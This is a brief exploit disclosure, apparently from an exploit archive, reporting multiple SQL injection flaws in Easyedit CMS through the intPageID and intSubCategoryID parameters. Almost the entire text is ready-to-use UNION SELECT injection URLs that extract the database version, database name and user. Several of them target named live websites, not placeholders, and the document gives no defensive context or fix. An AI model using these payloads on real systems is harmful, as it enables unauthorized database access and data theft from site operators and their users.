Easyedit CMS suffers from multiple remote SQL injection vulnerabilities.
e56537569465cd143e885896d146ffc293267dfa4bfcc1243d624f64ce6c0b66
Easyedit CMS - Multiple Sql Injection Vulnerability
[ page.php?intPageID) (subcategory.php?intSubCategoryID) (news.php?intPageID]
http://www.easyedit.ie
Bug fOUND BY d3v1l ( Avram Marius ) - http://security-sh3ll.com/forum.php
www.site.com/page.php?intPageID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
Example :-
http://www.healthyliving.ie/page.php?intPageID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
x
http://www.healthyliving.ie/subcategory.php?intSubCategoryID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
x
http://www.ci3.ie/news.php?intPageID=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())--